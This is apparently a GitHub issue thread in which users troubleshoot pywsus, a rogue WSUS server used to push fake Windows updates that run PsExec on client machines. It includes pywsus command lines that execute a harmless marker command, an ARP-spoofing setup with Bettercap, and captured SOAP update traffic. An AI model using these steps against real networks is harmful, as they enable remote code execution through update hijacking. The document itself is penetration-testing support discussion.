PoC Failure on Win10 - Not domain joined
Opened this issue · 22 comments
Trying to replicate the PoC in a simple setting involving two Win10 boxes with a direct network connection (i.e., no MITM involved), the process gets stuck after the SyncUpdates phase.
Whenever 'check for updates' is performed on the client, pywsus receives a SyncUpdates SOAP HTTP request. However, unlike the PoC, a GetExtendedUpdateInfo request is never received by pywsus.
Setup
Client (Win10, 10.0.0.14 ) <----------> pywsus (Win10, 10.0.0.4, local firewall disabled)
Client
Betriebssystemname: Microsoft Windows 10 Pro
Betriebssystemversion: 10.0.19043 Nicht zutreffend Build 19043
Betriebssystemhersteller: Microsoft Corporation
Betriebssystemkonfiguration: Eigenständige Arbeitsstation
Typ des Betriebssystembuilds: Multiprocessor Free
Systemtyp: x64-based PC
Prozessor(en): 1 Prozessor(en) installiert.
[01]: Intel64 Family 6 Model 23 Stepping 10 GenuineIntel ~3003 MHz
Domain: WORKGROUP
Hotfix(es): 11 Hotfix(e) installiert.
[01]: KB5004331
[02]: KB4577266
[03]: KB4577586
[04]: KB4580325
[05]: KB4586864
[06]: KB4589212
[07]: KB4593175
[08]: KB4598481
[09]: KB5000736
[10]: KB5004237
[11]: KB5003742
PYWSUS
Betriebssystemname: Microsoft Windows 10 Pro
Betriebssystemversion: 10.0.19042 Nicht zutreffend Build 19042
Betriebssystemhersteller: Microsoft Corporation
Betriebssystemkonfiguration: Eigenständige Arbeitsstation
Typ des Betriebssystembuilds: Multiprocessor Free
Systemtyp: x64-based PC
Prozessor(en): 1 Prozessor(en) installiert.
[01]: Intel64 Family 6 Model 142 Stepping 12 GenuineIntel ~1803 MHz
Domain: WORKGROUP
Hotfix(es): 11 Hotfix(e) installiert.
[01]: KB5004331
[02]: KB4562830
[03]: KB4577266
[04]: KB4577586
[05]: KB4580325
[06]: KB4586864
[07]: KB4589212
[08]: KB4593175
[09]: KB4598481
[10]: KB5004237
[11]: KB5003742
Windows Update Client + WSUS Configuration
Client configuration via GPO
- Internal update server + intranet server for statistics: http://10.0.0.4:8530
- no connection to MS Windows Update Servers allowed
- setting 3 enabled
pywsus is run with simplified command line: python pywsus.py -v -H 10.0.0.4 -p 8530 -e PsExec64.exe -c "/accepteula"
Results + Output of tools
Whenever 'check for updates' is performed on the client, pywsus receives a SyncUpdates SOAP HTTP request and responds. However, a GetExtendedUpdateInfo request is never received by pywsus. After some time the client initiates a ReportEventBatch action, which is subsequently answered by pywsus.
- The Win10 updates GUI shows no error, but also no available updates.
- The WindowsUpdateClient eventlog just contains an event with ID 26 (no updates found), but no errors.
- The WindowsUpdate log file (etl) is attached: WindowsUpdate.20210802.etl.txt
- The output of pywsus is as follows: pywsus_output.txt
Hi @fneur and thank you for the detailed issue.
I would have time to redo the attack with your configuration in next weeks.
Probable issue that I could think on top of my head:
- Stop the MitM and re-force update. The client will resync and clean any non-wanted update.
Thank you
@nitbx many thanks in advance for your support! I think I will try out different configurations meanwhile. Cheers, F.
Hi @fneur
I just updated everything and it seem to work with a basic MiTM attack:
- Kali
sudo python3 pywsus.py -H 192.168.178.141 -p 8530 -e sysint/PsExec.exe -c '/accepteula /s cmd.exe /c "echo pocAug2021 > C:\\poc.txt"'- Bettercap
Set arp.spoof.internal true
- Windows 10 Pro
- 12 Hotfix(s) Installed:
[01]: KB5004331
[02]: KB4562830
[03]: KB4570334
[04]: KB4577266
[05]: KB4577586
[06]: KB4580325
[07]: KB4586864
[08]: KB4589212
[09]: KB4598481
[10]: KB5000736
- 12 Hotfix(s) Installed:
For the next step, I will try to do as you did.
simple setting involving two Win10 boxes with a direct network connection (i.e., no MITM involved)
Thank you.
HI @nitbx
thanks for the update. Recently, I also did some further testing, where I replaced the (pywsus) server machine (which was running Win10 in my original setup) with a (virtual) Linux machine. The client stayed the same and, unfortunately, the results stayed the same.
Whenever 'check for updates' is performed on the client, pywsus receives a SyncUpdates SOAP HTTP request. However, unlike the PoC, a GetExtendedUpdateInfo request is never received by pywsus.
Cheers, F.
Some more testing tonight with 2 AWS VMs (again with a direct network connection, same subnet):
- VM1 - Windows Server 2016 (English version this time, not German)
- VM2 - Amazon Linux running pywsus
Same result: PoC not working
Hi @fneur,
Just did a test and it work on my side.
From the DC, I changed the GPO to put my kali as the WSUS server:
After that I changed the network for the Kali and the Window10 workstation for host-only 192.168.78.0/24.
Kali: 192.168.78.133
Windows10 worksation: 192.168.78.130
Can you give us a Wireshark trace? I'm not sure why you have this behaviour.
Thank you !
Here's a Wireshark capture file (wrt my original setup):
Many thanks in advance for taking the time!
Well, I see no difference except ID, time and uid...
Here is the SyncUpdates SOAP call.
Yours:
POST /ClientWebService/client.asmx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Accept-Encoding: xpress
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.32
SOAPAction: "http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/SyncUpdates"
MS-CV: xs2YnzOO2ESTjlEL.0.1.0.0.2.2
Content-Length: 1495
Host: 10.0.0.4:8530
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SyncUpdates xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService"><cookie><Expiration>2021-08-15T09:09:57.539151Z</Expiration><EncryptedData>QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=</EncryptedData></cookie><parameters><ExpressQuery>false</ExpressQuery><OtherCachedUpdateIDs><int>906959</int><int>907721</int><int>912032</int><int>912707</int><int>912798</int><int>913143</int><int>913431</int><int>913790</int><int>918003</int><int>918525</int><int>922259</int><int>926799</int><int>929423</int><int>929958</int><int>934826</int><int>942380</int><int>942745</int><int>943603</int><int>946052</int><int>947235</int><int>949830</int><int>949995</int><int>952866</int><int>954408</int><int>958306</int><int>958350</int><int>959017</int><int>960800</int><int>960842</int><int>962375</int><int>962417</int><int>962955</int><int>964220</int><int>967380</int><int>967686</int><int>968789</int><int>974644</int><int>974844</int><int>975850</int><int>977795</int><int>985358</int><int>985936</int><int>987159</int><int>988853</int><int>988967</int><int>993345</int><int>994150</int><int>996723</int><int>999125</int><int>999488</int></OtherCachedUpdateIDs><SkipSoftwareSync>false</SkipSoftwareSync><NeedTwoGroupOutOfScopeUpdates>false</NeedTwoGroupOutOfScopeUpdates><AlsoPerformRegularSync>true</AlsoPerformRegularSync><ComputerSpec/></parameters></SyncUpdates></s:Body></s:Envelope>HTTP/1.1 200 OK
Server: BaseHTTP/0.6 Python/3.9.5
Date: Sat, 14 Aug 2021 07:11:31 GMT
Cache-Control: private
Content-type: text/xml; chartset=utf-8
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w4.org/2001/XMLSchema-instance"><SyncUpdatesResponse xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService"><SyncUpdatesResult><NewUpdates><UpdateInfo><ID>948473</ID><Deployment><ID>83531</ID><Action>Install</Action><IsAssigned>true</IsAssigned><LastChangeTime>2020-02-29</LastChangeTime><AutoSelect>0</AutoSelect><AutoDownload>0</AutoDownload><SupersedenceBehavior>0</SupersedenceBehavior></Deployment><IsLeaf>true</IsLeaf><Xml><UpdateIdentity UpdateID="5da52daa-4291-4d33-a793-126431242932" RevisionNumber="204" /><Properties UpdateType="Software" ExplicitlyDeployable="true" AutoSelectOnWebSites="true" /><Relationships><Prerequisites><AtLeastOne IsCategory="true"><UpdateIdentity UpdateID="0fa1201d-4330-4fa8-8ae9-b877473b6441" /></AtLeastOne></Prerequisites><BundledUpdates><UpdateIdentity UpdateID="ab3f2196-408f-4fd7-832f-5f6f3306f925" RevisionNumber="204" /></BundledUpdates></Relationships></Xml></UpdateInfo><UpdateInfo><ID>913837</ID><Deployment><ID>91622</ID><Action>Bundle</Action><IsAssigned>true</IsAssigned><LastChangeTime>2020-02-29</LastChangeTime><AutoSelect>0</AutoSelect><AutoDownload>0</AutoDownload><SupersedenceBehavior>0</SupersedenceBehavior></Deployment><IsLeaf>true</IsLeaf><Xml><UpdateIdentity UpdateID="ab3f2196-408f-4fd7-832f-5f6f3306f925" RevisionNumber="204" /><Properties UpdateType="Software" /><Relationships></Relationships><ApplicabilityRules><IsInstalled><False /></IsInstalled><IsInstallable><True /></IsInstallable></ApplicabilityRules></Xml></UpdateInfo></NewUpdates><Truncated>false</Truncated><NewCookie><Expiration>2021-08-15T09:09:57.550178</Expiration><EncryptedData>QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=</EncryptedData></NewCookie><DriverSyncNotNeeded>true</DriverSyncNotNeeded></SyncUpdatesResult></SyncUpdatesResponse></s:Body></s:Envelope>
Mine:
POST /ClientWebService/client.asmx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Accept-Encoding: xpress
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.32
SOAPAction: "http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/SyncUpdates"
MS-CV: VLerXppsd0igftUH.0.1.0.0.2.2
Content-Length: 21993
Host: 192.168.78.133:8530
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SyncUpdates xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService"><cookie><Expiration>2021-08-14T18:30:49.816834Z</Expiration><EncryptedData>QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=</EncryptedData></cookie><parameters><ExpressQuery>false</ExpressQuery><InstalledNonLeafUpdateIDs><int>16</int><int>28</int><int>43</int><int>73[...]</OtherCachedUpdateIDs><SkipSoftwareSync>false</SkipSoftwareSync><NeedTwoGroupOutOfScopeUpdates>false</NeedTwoGroupOutOfScopeUpdates><AlsoPerformRegularSync>true</AlsoPerformRegularSync><ComputerSpec/></parameters></SyncUpdates></s:Body></s:Envelope>HTTP/1.1 200 OK
Server: BaseHTTP/0.6 Python/3.9.1+
Date: Fri, 13 Aug 2021 22:31:09 GMT
Cache-Control: private
Content-type: text/xml; chartset=utf-8
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w4.org/2001/XMLSchema-instance"><SyncUpdatesResponse xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService"><SyncUpdatesResult><NewUpdates><UpdateInfo><ID>964121</ID><Deployment><ID>99691</ID><Action>Install</Action><IsAssigned>true</IsAssigned><LastChangeTime>2020-02-29</LastChangeTime><AutoSelect>0</AutoSelect><AutoDownload>0</AutoDownload><SupersedenceBehavior>0</SupersedenceBehavior></Deployment><IsLeaf>true</IsLeaf><Xml><UpdateIdentity UpdateID="104fafec-ec5d-499a-9efe-fb01b88d4bfc" RevisionNumber="204" /><Properties UpdateType="Software" ExplicitlyDeployable="true" AutoSelectOnWebSites="true" /><Relationships><Prerequisites><AtLeastOne IsCategory="true"><UpdateIdentity UpdateID="0fa1201d-4330-4fa8-8ae9-b877473b6441" /></AtLeastOne></Prerequisites><BundledUpdates><UpdateIdentity UpdateID="1a29a58c-f4a1-45f8-815e-b842ed07eba3" RevisionNumber="204" /></BundledUpdates></Relationships></Xml></UpdateInfo><UpdateInfo><ID>992302</ID><Deployment><ID>93435</ID><Action>Bundle</Action><IsAssigned>true</IsAssigned><LastChangeTime>2020-02-29</LastChangeTime><AutoSelect>0</AutoSelect><AutoDownload>0</AutoDownload><SupersedenceBehavior>0</SupersedenceBehavior></Deployment><IsLeaf>true</IsLeaf><Xml><UpdateIdentity UpdateID="1a29a58c-f4a1-45f8-815e-b842ed07eba3" RevisionNumber="204" /><Properties UpdateType="Software" /><Relationships></Relationships><ApplicabilityRules><IsInstalled><False /></IsInstalled><IsInstallable><True /></IsInstallable></ApplicabilityRules></Xml></UpdateInfo></NewUpdates><Truncated>false</Truncated><NewCookie><Expiration>2021-08-14T18:30:49.816861</Expiration><EncryptedData>QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=</EncryptedData></NewCookie><DriverSyncNotNeeded>true</DriverSyncNotNeeded></SyncUpdatesResult></SyncUpdatesResponse></s:Body></s:Envelope>
I guess I would need to try on AWS in order to have the exact same version as you.
Thank you.
Hi @nitbx,
can you provide your WindowsUpdate log file, please, so we can compare it with the one I linked above (in the first comment)?
We might spot differences there.
(Note: The Get-WindowsUpdateLog cmdlet merges and converts Windows Update .etl files into a single readable WindowsUpdate.log file)
Thank you!
Interesting command, didn't know about it.
WindowsUpdate.log (Lots of garbage in the logs from testing)
Thank you.
Hi @nitbx,
just compared the WindowsUpdate.log you provided above with mine (recorded on a physical Windows 10 PRO machine):
Comments / Results
- The main difference is the GetExtendedUpdateInfo call, which is highlighted in blue colour in your log file and totally missing in mine. This part seems to be responsible for adding applicable updates to the search list.
- Another difference is the call to SimpleAuthWebService that is present in your log file (several times) and missing in mine. In fact, I never see this call in any of my logs (and meanwhile I did quite some testing on different machines).
- The logs produced on my AWS Windows Server VM are basically the same as the Windows 10 PRO logs depicted above.
Questions
- Does this tell you something?
- Is it important that the client machine is joined to a domain? (I read that somewhere. My machines are not domain-joined.)
Thanks,
F.
Additional info to the previous post:
I also did a test after cleaning the Windows SoftwareDistribution folder (which is often recommended to troubleshoot Windows Update problems). The corresponding log file is depicted below (basically the same as in the previous post, but with an additional GetConfig call):
Hi @fneur and thank you for the time you take to address this issue with us.
For now it does not ring any bell, but I will try with a non-domain join host.
After, can you show me your GPO in order to specify the WSUS. I'm not sure what you mean by:
Internal update server + intranet server for statistics: http://10.0.0.4:8530
no connection to MS Windows Update Servers allowed
setting 3 enabled <---- ?
Mine:
I got the same issue with a non-domain joined host.
POST /ClientWebService/client.asmx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/xml; charset=utf-8
Accept-Encoding: xpress
User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.32
SOAPAction: "http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/SyncUpdates"
MS-CV: pB9M6b7RckGPpXqU.0.1.0.0.2.1
Content-Length: 815
Host: 192.168.178.143:8530
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SyncUpdates xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService"><cookie><Expiration>2021-08-23T12:08:57.325699Z</Expiration><EncryptedData>QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=</EncryptedData></cookie><parameters><ExpressQuery>false</ExpressQuery><OtherCachedUpdateIDs><int>906239</int><int>910283</int><int>911970</int><int>943135</int><int>975153</int><int>976831</int><int>978234</int><int>982703</int><int>985672</int><int>992916</int></OtherCachedUpdateIDs><SkipSoftwareSync>false</SkipSoftwareSync><NeedTwoGroupOutOfScopeUpdates>false</NeedTwoGroupOutOfScopeUpdates><AlsoPerformRegularSync>true</AlsoPerformRegularSync><ComputerSpec/></parameters></SyncUpdates></s:Body></s:Envelope>HTTP/1.1 200 OK
Server: BaseHTTP/0.6 Python/3.9.1+
Date: Sun, 22 Aug 2021 16:09:15 GMT
Cache-Control: private
Content-type: text/xml; chartset=utf-8
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w4.org/2001/XMLSchema-instance"><SyncUpdatesResponse xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService"><SyncUpdatesResult><NewUpdates><UpdateInfo><ID>915262</ID><Deployment><ID>87339</ID><Action>Install</Action><IsAssigned>true</IsAssigned><LastChangeTime>2020-02-29</LastChangeTime><AutoSelect>0</AutoSelect><AutoDownload>0</AutoDownload><SupersedenceBehavior>0</SupersedenceBehavior></Deployment><IsLeaf>true</IsLeaf><Xml><UpdateIdentity UpdateID="d0963579-594f-45c8-97e0-e363c3998b6e" RevisionNumber="204" /><Properties UpdateType="Software" ExplicitlyDeployable="true" AutoSelectOnWebSites="true" /><Relationships><Prerequisites><AtLeastOne IsCategory="true"><UpdateIdentity UpdateID="0fa1201d-4330-4fa8-8ae9-b877473b6441" /></AtLeastOne></Prerequisites><BundledUpdates><UpdateIdentity UpdateID="c0a8d539-ca9b-4644-81b8-57efe7c0c93f" RevisionNumber="204" /></BundledUpdates></Relationships></Xml></UpdateInfo><UpdateInfo><ID>977787</ID><Deployment><ID>83231</ID><Action>Bundle</Action><IsAssigned>true</IsAssigned><LastChangeTime>2020-02-29</LastChangeTime><AutoSelect>0</AutoSelect><AutoDownload>0</AutoDownload><SupersedenceBehavior>0</SupersedenceBehavior></Deployment><IsLeaf>true</IsLeaf><Xml><UpdateIdentity UpdateID="c0a8d539-ca9b-4644-81b8-57efe7c0c93f" RevisionNumber="204" /><Properties UpdateType="Software" /><Relationships></Relationships><ApplicabilityRules><IsInstalled><False /></IsInstalled><IsInstallable><True /></IsInstallable></ApplicabilityRules></Xml></UpdateInfo></NewUpdates><Truncated>false</Truncated><NewCookie><Expiration>2021-08-23T12:09:13.871497</Expiration><EncryptedData>QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE=</EncryptedData></NewCookie><DriverSyncNotNeeded>true</DriverSyncNotNeeded></SyncUpdatesResult></SyncUpdatesResponse></s:Body></s:Envelope>
I'm confident that if we find the right UpdateID we can make it work.
Still nice that we found the issue.
Thank you.
I found something.
Fresh Windows 10 not domain joined but with latest update from MSFT
- The windows 10 clients do not ask for GetExtendedUpdateInfo
Fresh Windows 10 not domain joined with the latest update from MSFT. After registering with the real WSUS and performing one checks update. Then changing the local GPO for the PYWSUS server.
- The attack is working
I will compare Wireshark traces and keep you updated.
Thank you
Same situation here. I can never get past SyncUpdates. Any updates on this?
Thank you
No. Unfortunately, no positive updates on my part!
Thanks for following up. I'm working on it when it possible.
The status is that I'm confident the attack could work on a non-domain join computer.
Performing the attack, the other way around (with WSUSpendu). I'm able to inject a malicious update to a non-domain joined workstations.
Now it just a question of finding a needle in a PCAP.
Has there been any update on this? I'm having the same issue on a fresh installed windows 10 pro.
Out of the box the client wouldn't get passed the SyncUpdates.
It did work after syncing with a legit WSUS server once and after that replace the WSUS server with the malicious one
Has there been any update on this? I'm having the same issue on a fresh installed windows 10 pro. Out of the box the client wouldn't get passed the SyncUpdates. It did work after syncing with a legit WSUS server once and after that replace the WSUS server with the malicious one
No
I am afraid I have the exacxt same problem and in a pentest the update never goes further than the syncupdate-request.... Probably the solution is to use another younger tool...
Anybody found a good working alternative?